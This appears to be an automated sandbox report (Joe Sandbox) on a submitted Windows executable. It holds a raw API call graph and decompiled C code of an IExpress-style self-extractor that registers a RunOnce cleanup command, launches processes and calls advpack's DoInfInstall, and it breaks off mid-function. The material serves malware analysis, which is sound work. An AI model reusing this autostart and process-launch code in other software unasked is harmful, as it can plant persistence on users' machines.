2920->2921 2922 3d1bd9 CompareStringA 2921->2922 2923 3d1d73 2921->2923 2922->2923 2924 3d1bf7 GetFileAttributesA 2922->2924 2925 3d66c8 2 API calls 2923->2925 2927 3d1c0d 2924->2927 2928 3d1d53 2924->2928 2926 3d1d7d 2925->2926 2929 3d1df8 LocalAlloc 2926->2929 2930 3d1d81 CompareStringA 2926->2930 2927->2928 2931 3d1a84 2 API calls 2927->2931 2933 3d44b9 20 API calls 2928->2933 2929->2928 2932 3d1e0b GetFileAttributesA 2929->2932 2930->2929 2937 3d1d9b 2930->2937 2934 3d1c31 2931->2934 2940 3d1e1d 2932->2940 2952 3d1e45 2932->2952 2951 3d1cc2 2933->2951 2935 3d1c50 LocalAlloc 2934->2935 2941 3d1a84 2 API calls 2934->2941 2935->2928 2938 3d1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2935->2938 2936 3d1e89 2939 3d6ce0 4 API calls 2936->2939 2937->2937 2942 3d1dbe LocalAlloc 2937->2942 2947 3d1cf8 2938->2947 2938->2951 2945 3d1ea1 2939->2945 2940->2952 2941->2935 2942->2928 2946 3d1de1 2942->2946 2945->2669 2950 3d171e _vsnprintf 2946->2950 2948 3d1d09 GetShortPathNameA 2947->2948 2949 3d1d23 2947->2949 2948->2949 2953 3d171e _vsnprintf 2949->2953 2950->2951 2951->2936 3024 3d2aac 2952->3024 2953->2951 2955 3d209a 2954->2955 2956 3d2256 2954->2956 2958 3d171e _vsnprintf 2955->2958 2961 3d20dc 2955->2961 2957 3d6ce0 4 API calls 2956->2957 2959 3d2263 2957->2959 2960 3d20af RegQueryValueExA 2958->2960 2959->2669 2960->2955 2960->2961 2962 3d20fb GetSystemDirectoryA 2961->2962 2963 3d20e4 RegCloseKey 2961->2963 2964 3d658a CharPrevA 2962->2964 2963->2956 2965 3d211b LoadLibraryA 2964->2965 2966 3d212e GetProcAddress FreeLibrary 2965->2966 2967 3d2179 GetModuleFileNameA 2965->2967 2966->2967 2969 3d214e GetSystemDirectoryA 2966->2969 2968 3d21de RegCloseKey 2967->2968 2972 3d2177 2967->2972 2968->2956 2970 3d2165 2969->2970 2969->2972 2971 3d658a CharPrevA 2970->2971 2971->2972 2972->2972 2973 3d21b7 LocalAlloc 2972->2973 2974 3d21cd 2973->2974 2975 3d21ec 2973->2975 2976 3d44b9 20 API calls 2974->2976 2977 3d171e _vsnprintf 2975->2977 2976->2968 2978 3d2218 
RegSetValueExA RegCloseKey LocalFree 2977->2978 2978->2956 2981 3d4106 2980->2981 2982 3d4016 CreateProcessA 2980->2982 2985 3d6ce0 4 API calls 2981->2985 2983 3d40c4 2982->2983 2984 3d4041 WaitForSingleObject GetExitCodeProcess 2982->2984 2987 3d6285 GetLastError 2983->2987 2992 3d4070 2984->2992 2986 3d4117 2985->2986 2986->2669 2989 3d40c9 GetLastError FormatMessageA 2987->2989 2991 3d44b9 20 API calls 2989->2991 2990 3d4096 CloseHandle CloseHandle 2990->2981 2993 3d40ba 2990->2993 2991->2981 3051 3d411b 2992->3051 2993->2981 2995 3d64c2 2994->2995 2996 3d658a CharPrevA 2995->2996 2997 3d64d8 GetFileAttributesA 2996->2997 2998 3d64ea 2997->2998 2999 3d6501 LoadLibraryA 2997->2999 2998->2999 3000 3d64ee LoadLibraryExA 2998->3000 3001 3d6508 2999->3001 3000->3001 3002 3d6ce0 4 API calls 3001->3002 3003 3d6513 3002->3003 3003->2702 3005 3d2289 RegOpenKeyExA 3004->3005 3006 3d2381 3004->3006 3005->3006 3008 3d22b1 RegQueryValueExA 3005->3008 3007 3d6ce0 4 API calls 3006->3007 3009 3d238c 3007->3009 3010 3d2374 RegCloseKey 3008->3010 3011 3d22e6 memset GetSystemDirectoryA 3008->3011 3009->2679 3010->3006 3012 3d230f 3011->3012 3013 3d2321 3011->3013 3014 3d658a CharPrevA 3012->3014 3015 3d171e _vsnprintf 3013->3015 3014->3013 3016 3d233f RegSetValueExA 3015->3016 3016->3010 3019 3d1a9a 3018->3019 3021 3d1aba 3019->3021 3023 3d1aaf 3019->3023 3037 3d667f 3019->3037 3021->2917 3022 3d667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 3d2be6 3024->3025 3026 3d2ad4 GetModuleFileNameA 3024->3026 3027 3d6ce0 4 API calls 3025->3027 3035 3d2b02 3026->3035 3029 3d2bf5 3027->3029 3028 3d2af1 IsDBCSLeadByte 3028->3035 3029->2936 3030 3d2bca CharNextA 3032 3d2bd3 CharNextA 3030->3032 3031 3d2b11 CharNextA CharUpperA 3033 3d2b8d CharUpperA 3031->3033 3031->3035 3032->3035 3033->3035 3035->3025 3035->3028 3035->3030 3035->3031 3035->3032 3036 3d2b43 CharPrevA 3035->3036 3042 3d65e8 3035->3042 3036->3035 3040 3d6689 3037->3040 3038 3d6648 IsDBCSLeadByte 3038->3040 3039 3d66a5 
3039->3019 3040->3038 3040->3039 3041 3d6697 CharNextA 3040->3041 3041->3040 3043 3d65f4 3042->3043 3043->3043 3044 3d65fb CharPrevA 3043->3044 3045 3d6611 CharPrevA 3044->3045 3046 3d661e 3045->3046 3047 3d660b 3045->3047 3048 3d663d 3046->3048 3049 3d6634 CharNextA 3046->3049 3050 3d6627 CharPrevA 3046->3050 3047->3045 3047->3046 3048->3035 3049->3048 3050->3048 3050->3049 3052 3d4132 3051->3052 3054 3d412a 3051->3054 3055 3d1ea7 3052->3055 3054->2990 3056 3d1eba 3055->3056 3058 3d1ed3 3055->3058 3057 3d256d 15 API calls 3056->3057 3057->3058 3058->3054 3060 3d2026 3059->3060 3061 3d1ff0 RegOpenKeyExA 3059->3061 3060->2320 3061->3060 3062 3d200f RegDeleteValueA RegCloseKey 3061->3062 3062->3060 3173 3d6a20 __getmainargs 3174 3d19e0 3175 3d1a24 GetDesktopWindow 3174->3175 3176 3d1a03 3174->3176 3178 3d43d0 11 API calls 3175->3178 3177 3d1a20 3176->3177 3179 3d1a16 EndDialog 3176->3179 3181 3d6ce0 4 API calls 3177->3181 3180 3d1a33 LoadStringA SetDlgItemTextA MessageBeep 3178->3180 3179->3177 3180->3177 3182 3d1a7e 3181->3182 3063 3d4ad0 3071 3d3680 3063->3071 3066 3d4aee WriteFile 3068 3d4b0f 3066->3068 3069 3d4b14 3066->3069 3067 3d4ae9 3069->3068 3070 3d4b3b SendDlgItemMessageA 3069->3070 3070->3068 3072 3d3691 MsgWaitForMultipleObjects 3071->3072 3073 3d36a9 PeekMessageA 3072->3073 3074 3d36e8 3072->3074 3073->3072 3075 3d36bc 3073->3075 3074->3066 3074->3067 3075->3072 3075->3074 3076 3d36c7 DispatchMessageA 3075->3076 3077 3d36d1 PeekMessageA 3075->3077 3076->3077 3077->3075 3078 3d4cd0 3079 3d4d0b 3078->3079 3080 3d4cf4 3078->3080 3081 3d4d02 3079->3081 3084 3d4dcb 3079->3084 3087 3d4d25 3079->3087 3080->3081 3082 3d4b60 FindCloseChangeNotification 3080->3082 3083 3d6ce0 4 API calls 3081->3083 3082->3081 3085 3d4e95 3083->3085 3086 3d4dd4 SetDlgItemTextA 3084->3086 3088 3d4de3 3084->3088 3086->3088 3087->3081 3101 3d4c37 3087->3101 3088->3081 3106 3d476d 3088->3106 3092 3d4e38 3092->3081 3094 3d4980 25 API calls 3092->3094 3093 3d4b60 
FindCloseChangeNotification 3095 3d4d99 SetFileAttributesA 3093->3095 3096 3d4e56 3094->3096 3095->3081 3096->3081 3097 3d4e64 3096->3097 3115 3d47e0 LocalAlloc 3097->3115 3100 3d4e6f 3100->3081 3102 3d4c88 3101->3102 3103 3d4c4c DosDateTimeToFileTime 3101->3103 3102->3081 3102->3093 3103->3102 3104 3d4c5e LocalFileTimeToFileTime 3103->3104 3104->3102 3105 3d4c70 SetFileTime 3104->3105 3105->3102 3124 3d66ae GetFileAttributesA 3106->3124 3108 3d477b 3108->3092 3109 3d47cc SetFileAttributesA 3111 3d47db 3109->3111 3111->3092 3112 3d6517 24 API calls 3113 3d47b1 3112->3113 3113->3109 3113->3111 3114 3d47c2 3113->3114 3114->3109 3116 3d480f LocalAlloc 3115->3116 3117 3d47f6 3115->3117 3120 3d4831 3116->3120 3123 3d480b 3116->3123 3118 3d44b9 20 API calls 3117->3118 3118->3123 3121 3d44b9 20 API calls 3120->3121 3122 3d4846 LocalFree 3121->3122 3122->3123 3123->3100 3125 3d4777 3124->3125 3125->3108 3125->3109 3125->3112 3183 3d3210 3184 3d3227 3183->3184 3207 3d328e EndDialog 3183->3207 3185 3d3235 3184->3185 3186 3d33e2 GetDesktopWindow 3184->3186 3190 3d32dd GetDlgItemTextA 3185->3190 3191 3d324c 3185->3191 3198 3d3239 3185->3198 3188 3d43d0 11 API calls 3186->3188 3189 3d33f1 SetWindowTextA SendDlgItemMessageA 3188->3189 3192 3d341f GetDlgItem EnableWindow 3189->3192 3189->3198 3199 3d32fc 3190->3199 3215 3d3366 3190->3215 3193 3d32c5 EndDialog 3191->3193 3194 3d3251 3191->3194 3192->3198 3193->3198 3195 3d325c LoadStringA 3194->3195 3194->3198 3197 3d3294 3195->3197 3208 3d327b 3195->3208 3196 3d44b9 20 API calls 3196->3198 3221 3d4224 LoadLibraryA 3197->3221 3202 3d3331 GetFileAttributesA 3199->3202 3199->3215 3205 3d337c 3202->3205 3206 3d333f 3202->3206 3203 3d44b9 20 API calls 3203->3207 3204 3d32a5 SetDlgItemTextA 3204->3198 3204->3208 3209 3d658a CharPrevA 3205->3209 3210 3d44b9 20 API calls 3206->3210 3207->3198 3208->3203 3211 3d338d 3209->3211 3212 3d3351 3210->3212 3213 3d58c8 27 API calls 3211->3213 3212->3198 3214 3d335a CreateDirectoryA 3212->3214 
3216 3d3394 3213->3216 3214->3205 3214->3215 3215->3196 3216->3215 3217 3d33a4 3216->3217 3218 3d33c7 EndDialog 3217->3218 3219 3d597d 34 API calls 3217->3219 3218->3198 3220 3d33c3 3219->3220 3220->3198 3220->3218 3222 3d4246 GetProcAddress 3221->3222 3223 3d43b2 3221->3223 3224 3d425d GetProcAddress 3222->3224 3225 3d43a4 FreeLibrary 3222->3225 3227 3d44b9 20 API calls 3223->3227 3224->3225 3226 3d4274 GetProcAddress 3224->3226 3225->3223 3226->3225 3228 3d428b 3226->3228 3230 3d329d 3227->3230 3229 3d4295 GetTempPathA 3228->3229 3235 3d42e1 3228->3235 3231 3d42ad 3229->3231 3230->3198 3230->3204 3231->3231 3232 3d42b4 CharPrevA 3231->3232 3233 3d42d0 CharPrevA 3232->3233 3232->3235 3233->3235 3234 3d4390 FreeLibrary 3234->3230 3235->3234 3236 3d4a50 3237 3d4a9f ReadFile 3236->3237 3238 3d4a66 3236->3238 3240 3d4abb 3237->3240 3239 3d4a82 memcpy 3238->3239 3238->3240 3239->3240 3241 3d3450 3242 3d345e 3241->3242 3243 3d34d3 EndDialog 3241->3243 3245 3d349a GetDesktopWindow 3242->3245 3246 3d3465 3242->3246 3244 3d346a 3243->3244 3247 3d43d0 11 API calls 3245->3247 3246->3244 3249 3d348c EndDialog 3246->3249 3248 3d34ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3247->3248 3248->3244 3249->3244 3126 3d6f40 SetUnhandledExceptionFilter 3127 3d4cc0 GlobalFree 3250 3d4200 3251 3d421e 3250->3251 3252 3d420b SendMessageA 3250->3252 3252->3251 3253 3d3100 3254 3d3111 3253->3254 3255 3d31b0 3253->3255 3259 3d3149 GetDesktopWindow 3254->3259 3262 3d311d 3254->3262 3256 3d31b9 SendDlgItemMessageA 3255->3256 3257 3d3141 3255->3257 3256->3257 3258 3d3138 EndDialog 3258->3257 3260 3d43d0 11 API calls 3259->3260 3261 3d315d 6 API calls 3260->3261 3261->3257 3262->3257 3262->3258 3263 3d4bc0 3264 3d4bd7 3263->3264 3266 3d4c05 3263->3266 3265 3d4c1b SetFilePointer 3265->3264 3266->3264 3266->3265 3267 3d30c0 3268 3d30de CallWindowProcA 3267->3268 3269 3d30ce 3267->3269 3270 3d30da 3268->3270 3269->3268 3269->3270 3271 3d63c0 3272 3d6407 3271->3272 3273 3d658a CharPrevA 
3272->3273 3274 3d6415 CreateFileA 3273->3274 3275 3d6448 WriteFile 3274->3275 3276 3d643a 3274->3276 3277 3d6465 CloseHandle 3275->3277 3279 3d6ce0 4 API calls 3276->3279 3277->3276 3280 3d648f 3279->3280 3281 3d6c03 3282 3d6c1e 3281->3282 3283 3d6c17 _exit 3281->3283 3284 3d6c27 _cexit 3282->3284 3285 3d6c32 3282->3285 3283->3282 3284->3285

                                                                        Callgraph


                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E003D202A(struct HINSTANCE__* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				int _v536;
                                                                        				int _v540;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				long _t36;
                                                                        				long _t41;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				CHAR* _t54;
                                                                        				void _t56;
                                                                        				signed int _t66;
                                                                        				intOrPtr* _t72;
                                                                        				void* _t73;
                                                                        				void* _t75;
                                                                        				void* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				void* _t90;
                                                                        				_Unknown_base(*)()* _t91;
                                                                        				signed int _t93;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_t28 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t28 ^ _t93;
                                                                        				_t84 = 0x104;
                                                                        				memset( &_v268, 0, 0x104);
                                                                        				memset( &_v528, 0, 0x104);
                                                                        				_t95 = _t94 + 0x18;
                                                                        				_t66 = 0;
                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L24:
                                                                        					return E003D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                        				}
                                                                        				_push(_t86);
                                                                        				_t87 = 0;
                                                                        				while(1) {
                                                                        					E003D171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                        					_t95 = _t95 + 0x10;
                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                        					if(_t41 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					if(_t87 < 0xc8) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				if(_t87 != 0xc8) {
                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                        					_t79 = _t84;
                                                                        					E003D658A( &_v528, _t84, "advpack.dll");
                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                        					_t84 = _t46;
                                                                        					if(_t84 == 0) {
                                                                        						L10:
                                                                        						if(GetModuleFileNameA( *0x3d9a3c,  &_v268, 0x104) == 0) {
                                                                        							L17:
                                                                        							_t36 = RegCloseKey(_v532);
                                                                        							L23:
                                                                        							_pop(_t86);
                                                                        							goto L24;
                                                                        						}
                                                                        						L11:
                                                                        						_t72 =  &_v268;
                                                                        						_t80 = _t72 + 1;
                                                                        						do {
                                                                        							_t49 =  *_t72;
                                                                        							_t72 = _t72 + 1;
                                                                        						} while (_t49 != 0);
                                                                        						_t73 = _t72 - _t80;
                                                                        						_t81 = 0x3d91e4;
                                                                        						do {
                                                                        							_t50 =  *_t81;
                                                                        							_t81 = _t81 + 1;
                                                                        						} while (_t50 != 0);
                                                                        						_t84 = _t73 + 0x50 + _t81 - 0x3d91e5;
                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3d91e5);
                                                                        						if(_t90 != 0) {
                                                                        							 *0x3d8580 = _t66 ^ 0x00000001;
                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                        							if(_t66 == 0) {
                                                                        								_t54 = "%s /D:%s";
                                                                        							}
                                                                        							_push("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\IXP000.TMP\\");
                                                                        							E003D171E(_t90, _t84, _t54,  &_v268);
                                                                        							_t75 = _t90;
                                                                        							_t23 = _t75 + 1; // 0x1
                                                                        							_t79 = _t23;
                                                                        							do {
                                                                        								_t56 =  *_t75;
                                                                        								_t75 = _t75 + 1;
                                                                        							} while (_t56 != 0);
                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                        							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                        							RegCloseKey(_v532); // executed
                                                                        							_t36 = LocalFree(_t90);
                                                                        							goto L23;
                                                                        						}
                                                                        						_t79 = 0x4b5;
                                                                        						E003D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                        					FreeLibrary(_t84); // executed
                                                                        					if(_t91 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        						E003D658A( &_v268, 0x104, 0x3d1140);
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        				_t36 = RegCloseKey(_v532);
                                                                        				 *0x3d8530 = _t66;
                                                                        				goto L23;
                                                                        			}

                                                                        APIs
                                                                        • memset.MSVCRT ref: 003D2050
                                                                        • memset.MSVCRT ref: 003D205F
                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 003D208C
                                                                          • Part of subcall function 003D171E: _vsnprintf.MSVCRT ref: 003D1750
                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D20C9
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D20EA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D2103
                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D2122
                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 003D2134
                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D2144
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D215B
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D218C
                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D21C1
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D21E4
                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 003D223D
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D2249
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D2250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                        • API String ID: 178549006-2414900631
                                                                        • Opcode ID: 6bf9246dce88eeb11b82602add57da8cc4fa0c834b5caa798fa0f0415e016d49
                                                                        • Instruction ID: 377a36b247df7bbf0907b0a970c92e91b9a73907508cdac4eabad18b79aca28c
                                                                        • Opcode Fuzzy Hash: 6bf9246dce88eeb11b82602add57da8cc4fa0c834b5caa798fa0f0415e016d49
                                                                        • Instruction Fuzzy Hash: 1A51F573A01214ABDB239B60FC49FEB773CEB55700F0041A7FA45E7251DA719E898A60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 82%
                                                                        			E003D3BA2() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				short _v300;
                                                                        				intOrPtr _v304;
                                                                        				void _v348;
                                                                        				char _v352;
                                                                        				intOrPtr _v356;
                                                                        				signed int _v360;
                                                                        				short _v364;
                                                                        				char* _v368;
                                                                        				intOrPtr _v372;
                                                                        				void* _v376;
                                                                        				intOrPtr _v380;
                                                                        				char _v384;
                                                                        				signed int _v388;
                                                                        				intOrPtr _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				void* _v408;
                                                                        				void* _v424;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t69;
                                                                        				signed int _t76;
                                                                        				void* _t77;
                                                                        				signed int _t79;
                                                                        				short _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				signed int _t101;
                                                                        				signed int _t104;
                                                                        				signed int _t108;
                                                                        				int _t112;
                                                                        				void* _t115;
                                                                        				signed char _t118;
                                                                        				void* _t125;
                                                                        				signed int _t127;
                                                                        				void* _t128;
                                                                        				struct HINSTANCE__* _t129;
                                                                        				void* _t130;
                                                                        				short _t137;
                                                                        				char* _t140;
                                                                        				signed char _t144;
                                                                        				signed char _t145;
                                                                        				signed int _t149;
                                                                        				void* _t150;
                                                                        				void* _t151;
                                                                        				signed int _t153;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t162;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        
                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                        				_t69 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t69 ^ _t164;
                                                                        				_t153 = 0;
                                                                        				 *0x3d9124 =  *0x3d9124 & 0;
                                                                        				_t149 = 0;
                                                                        				_v388 = 0;
                                                                        				_v384 = 0;
                                                                        				_t165 =  *0x3d8a28 - _t153; // 0x0
                                                                        				if(_t165 != 0) {
                                                                        					L3:
                                                                        					_t127 = 0;
                                                                        					_v392 = 0;
                                                                        					while(1) {
                                                                        						_v400 = _v400 & 0x00000000;
                                                                        						memset( &_v348, 0, 0x44);
                                                                        						_t164 = _t164 + 0xc;
                                                                        						_v348 = 0x44;
                                                                        						if( *0x3d8c42 != 0) {
                                                                        							goto L26;
                                                                        						}
                                                                        						_t146 =  &_v396;
                                                                        						_t115 = E003D468F("SHOWWINDOW",  &_v396, 4);
                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                        							L25:
                                                                        							_t146 = 0x4b1;
                                                                        							E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        							 *0x3d9124 = 0x80070714;
                                                                        							goto L62;
                                                                        						} else {
                                                                        							if(_v396 != 1) {
                                                                        								__eflags = _v396 - 2;
                                                                        								if(_v396 != 2) {
                                                                        									_t137 = 3;
                                                                        									__eflags = _v396 - _t137;
                                                                        									if(_v396 == _t137) {
                                                                        										_v304 = 1;
                                                                        										_v300 = _t137;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        								_push(6);
                                                                        								_v304 = 1;
                                                                        								_pop(0);
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_v304 = 1;
                                                                        								L11:
                                                                        								_v300 = 0;
                                                                        								L14:
                                                                        								if(_t127 != 0) {
                                                                        									L27:
                                                                        									_t155 = 1;
                                                                        									__eflags = _t127 - 1;
                                                                        									if(_t127 != 1) {
                                                                        										L31:
                                                                        										_t132 =  &_v280;
                                                                        										_t76 = E003D1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                        										__eflags = _t76;
                                                                        										if(_t76 == 0) {
                                                                        											L62:
                                                                        											_t77 = 0;
                                                                        											L63:
                                                                        											_pop(_t150);
                                                                        											_pop(_t156);
                                                                        											_pop(_t128);
                                                                        											return E003D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                        										}
                                                                        										_t157 = _v404;
                                                                        										__eflags = _t149;
                                                                        										if(_t149 != 0) {
                                                                        											L37:
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												L57:
                                                                        												_t151 = _v408;
                                                                        												_t146 =  &_v352;
                                                                        												_t130 = _t151; // executed
                                                                        												_t79 = E003D3FEF(_t130,  &_v352); // executed
                                                                        												__eflags = _t79;
                                                                        												if(_t79 == 0) {
                                                                        													L61:
                                                                        													LocalFree(_t151);
                                                                        													goto L62;
                                                                        												}
                                                                        												L58:
                                                                        												LocalFree(_t151);
                                                                        												_t127 = _t127 + 1;
                                                                        												_v396 = _t127;
                                                                        												__eflags = _t127 - 2;
                                                                        												if(_t127 >= 2) {
                                                                        													_t155 = 1;
                                                                        													__eflags = 1;
                                                                        													L69:
                                                                        													__eflags =  *0x3d8580;
                                                                        													if( *0x3d8580 != 0) {
                                                                        														E003D2267();
                                                                        													}
                                                                        													_t77 = _t155;
                                                                        													goto L63;
                                                                        												}
                                                                        												_t153 = _v392;
                                                                        												_t149 = _v388;
                                                                        												continue;
                                                                        											}
                                                                        											L38:
                                                                        											__eflags =  *0x3d8180;
                                                                        											if( *0x3d8180 == 0) {
                                                                        												_t146 = 0x4c7;
                                                                        												E003D44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                        												LocalFree(_v424);
                                                                        												 *0x3d9124 = 0x8007042b;
                                                                        												goto L62;
                                                                        											}
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											__eflags =  *0x3d9a34 & 0x00000004;
                                                                        											if(__eflags == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											_t129 = E003D6495(_t127, _t132, _t157, __eflags);
                                                                        											__eflags = _t129;
                                                                        											if(_t129 == 0) {
                                                                        												_t146 = 0x4c8;
                                                                        												E003D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                        												L65:
                                                                        												LocalFree(_v408);
                                                                        												 *0x3d9124 = E003D6285();
                                                                        												goto L62;
                                                                        											}
                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                        											_v404 = _t146;
                                                                        											__eflags = _t146;
                                                                        											if(_t146 == 0) {
                                                                        												_t146 = 0x4c9;
                                                                        												__eflags = 0;
                                                                        												E003D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                        												FreeLibrary(_t129);
                                                                        												goto L65;
                                                                        											}
                                                                        											__eflags =  *0x3d8a30;
                                                                        											_t151 = _v408;
                                                                        											_v384 = 0;
                                                                        											_v368 =  &_v280;
                                                                        											_t96 =  *0x3d9a40; // 0x3
                                                                        											_v364 = _t96;
                                                                        											_t97 =  *0x3d8a38 & 0x0000ffff;
                                                                        											_v380 = 0x3d9154;
                                                                        											_v376 = _t151;
                                                                        											_v372 = 0x3d91e4;
                                                                        											_v360 = _t97;
                                                                        											if( *0x3d8a30 != 0) {
                                                                        												_t97 = _t97 | 0x00010000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t144 =  *0x3d9a34; // 0x1
                                                                        											__eflags = _t144 & 0x00000008;
                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                        												_t97 = _t97 | 0x00020000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t144 & 0x00000010;
                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                        												_t97 = _t97 | 0x00040000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t145 =  *0x3d8d48; // 0x0
                                                                        											__eflags = _t145 & 0x00000040;
                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                        												_t97 = _t97 | 0x00080000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t145;
                                                                        											if(_t145 < 0) {
                                                                        												_t104 = _t97 | 0x00100000;
                                                                        												__eflags = _t104;
                                                                        												_v360 = _t104;
                                                                        											}
                                                                        											_t98 =  *0x3d9a38; // 0x0
                                                                        											_v356 = _t98;
                                                                        											_t130 = _t146;
                                                                        											 *0x3da288( &_v384);
                                                                        											_t101 = _v404();
                                                                        											__eflags = _t164 - _t164;
                                                                        											if(_t164 != _t164) {
                                                                        												_t130 = 4;
                                                                        												asm("int 0x29");
